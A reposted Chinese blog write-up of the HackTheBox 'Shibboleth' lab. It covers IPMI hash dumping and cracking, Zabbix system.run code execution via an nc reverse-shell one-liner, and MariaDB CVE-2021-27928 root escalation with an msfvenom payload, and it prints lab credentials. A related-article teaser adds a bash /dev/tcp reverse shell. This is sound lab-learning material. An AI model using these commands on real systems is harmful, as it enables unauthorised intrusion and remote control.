废物的靶场日记 hackthebox-Shibboleth

2023-11-05 15:40

本文主要是介绍废物的靶场日记 hackthebox-Shibboleth,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

废物的靶场日记 hackthebox-Shibboleth

今天做个medium难度的 以惩戒中午嗯造炸鸡奶茶的罪行!
明天继续开混easy 摆烂还是要摆烂的
靶场是Shibboleth 靶机IP 10.10.11.124

前渗透

老样子 信息收集 nmap -sV -A 10.10.11.124 只有一个80端口
访问发现得先绑一下hosts vi /etc/hosts 10.10.11.124 shibboleth.htb
但是访问发现这个网页好像是不完整的 而且没什么入口 于是dirsearch wfuzz两头开花扫扫
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u shibboleth.htb -H “Host:FUZZ.shibboleth.htb” --hw 26 开扫子域名

000000099: 200 29 L 219 W 3684 Ch “monitor”
000000346: 200 29 L 219 W 3684 Ch “monitoring”
000000390: 200 29 L 219 W 3684 Ch “zabbix”

出来三个子域名 dirsearch没啥东西 结果访问这三个子域名都是一样的后台登录地址 登录是post方式 懒狗必然是直接sqlmap -r a.txt跑一跑

跑了半天啥也没有 于是找了几个可能的词生成字典想试试爆破
但是这新装的kali上自带的burp限制爆破速度 仔细想想也不太可能是爆破
遂直接放弃 回头得更新一下工具
做到现在进度已经很明显了 基本上是啥都没做出来 麻了 但没有完全麻 局麻

回顾一下 比较有可能的就是有我没扫出来的端口了 一开始我以为是扫全端口结果还是没扫出来最后发现是扫UDP端口
sudo nmap -sU --min-rate 1000 10.10.11.124

623/udp open asf-rmcp
1068/udp closed instl_bootc

看到这么两个端口 好消息是这个623端口开着多半有花头 坏消息是它寄吧谁
直接msf里search一哈 search不到 那么就来到了我们的google英语阅读环节
发现623归属的IPMI 在2.0版本是有漏洞的 msf里search了一下有

auxiliary/scanner/ipmi/ipmi_version
跑一下 果然是2.0 这入口你挺能藏啊
之后 auxiliary(scanner/ipmi/ipmi_dumphashes) 得到

[+] 10.10.11.124:623 - IPMI - Hash found:
Administrator:d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450eca7da8a29de783e9a

然后就是hashcat跑了 这里hash modes是7300
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols

hashcat -m 7300 d21f58d6820100008e58c3351e556662ebf840d60f5874aec9120704e3f2f7e5e072a33126ce
69f4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:b55e3f63c7833751b2f450e
ca7da8a29de783e9a -a 0 rockyou.txt 开冲!

果不其然又到了每日一寄环节 新kali只设置了2g内存 冲不动 关掉kali重新设置8G内存再重新启动重连上来
得到密码 ilovepumkinpie1 南瓜饼确实能处!

登陆后台 没找到文件上传之类的东西 但是5.0.17版本的zabbix直接有exp https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
看了exp复现发现这是个锤子exp 后台原来直接就有官方rce

http://monitor.shibboleth.htb/items.php?form=create&hostid=10084
key选项可以直接select system.run 那就经典nc -lvnp 7888
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 7888 >/tmp/f,nowait]
弹回shell 前渗透结束

后渗透

进去了但是发现连cat user.txt都不够权限 纯废物权限啥都干不了
/etc/passwd 发现只有个ipmi-svc❌1000:1000:ipmi-svc,:/home/ipmi-svc:/bin/bash
密码就是后台密码 拿下user的flag f088a31c961388f860d617119d7b47b8

继续提权 看了一下端口有3306 mysql -V
mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
searchsploit小手一搜 版本不够 google小手一搜 CVE-2021-27928
可以在修改wsrep_provider和wsrep_notify_cmd后提权执行命令

不过这个cve提权需要mysql的密码 /etc/下面的.conf里有
zabbix bloooarskybluh

然后就是毫无含金量的cve模仿秀!
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f elf-so -o a.so
nc -lvp 4444
mysql -u zabbix -p -e ‘SET GLOBAL wsrep_provider="/tmp/a.so";’
4444的nc弹回来拿到root权限 找到另外一个root的flag c71237b166b874d49ade0926b21e6b6d 打完

打完之后rank也光荣的从noob进化成了Script Kiddie 可以说是对我这个废物完美的总结了

请添加图片描述

这篇关于废物的靶场日记 hackthebox-Shibboleth的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/350821

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

研1日记5

x = torch.tensor(x),numpy 转tensor 三维矩阵相加 screen -S pid 进入之前创建好的screen transpose()只能一次操作两个维度;permute()可以一次操作多维数据,且必须传入所有维度数, transpose()中的dim没有数的大小区分;permute()中的dim有数的大小区分 PyTorch 两大转置函数 trans

【项目日记】高并发内存池---细节优化及性能测试

终此一生,只有两种办法: 要么梦见生活,要么落实生活。 --- 勒内・夏尔 --- 高并发内存池---细节优化及性能测试 1 细节优化1.1 大块内存的申请处理1.2 配合定长池脱离使用new1.3 释放对象无需内存大小 2 调试Debug3 性能测试4 项目总结 1 细节优化 在前面的文章中我们已经实现了高并发内存池的申请内存逻辑和释放内存逻辑:

git svn 日记

1. git log -p -1 --name-only 该命令用于查看最新的一次提交记录的详细信息,包括文件更改情况。 git log:显示 Git 仓库的提交历史。-p:显示每次提交的差异 (diff),也就是文件内容的修改部分。-1:表示只显示最近的一次提交。--name-only:只显示被修改的文件名,而不显示详细的差异内容。 总结:该命令会输出最近一次提交的日志,显示提交的差异内容

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

uniapp微信小程序开发踩坑日记:Pinia持久化报错Cannot read property ‘localStorage‘ of undefined

插件默认使用 localStorage 实现持久化,小程序端不兼容,需要替换持久化 API import { defineStore } from 'pinia'   export const useCommonStore = defineStore('pack-store', {state: (): State => ({wwInfo: {},globalData: {},timerLoc

今麦郎「日记薪·1号发」 即时反馈,激活10000+名基层员工

本文内容整理自红海云CEO孙伟对今麦郎集团人力资源总经理王高峰、IT管理中心副总经理邹大勇的访谈。 坚持创新求变的品牌基因 过去30年,中国食品工业蓬勃发展,孕育出一批批在国际舞台上熠熠生辉的民族品牌。今麦郎作为民族品牌代表,自1994年创立以来,始终紧跟消费者需求变迁,从满足基础温饱的初心出发,逐步迈向品牌塑造、健康倡导及高端化探索的新征程,从家喻户晓的“今麦

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

JS学习日记———字符串

浏览器执行JS : 渲染引擎 (html + css) ,JS引擎 JS组成:ECMAScript语法,DOM(页面文档),BOM(浏览器对象) API:BOM + DOM DOM:通过接口对页面上各种元素进行(大小,位置,颜色等)操作 BOM:浏览器对象模型,通过BOM操作浏览器窗口(弹出框,控制转跳,获取分辨率) 字符拼接 字符串+任何类型=生成新字符(会将任何类型先转换为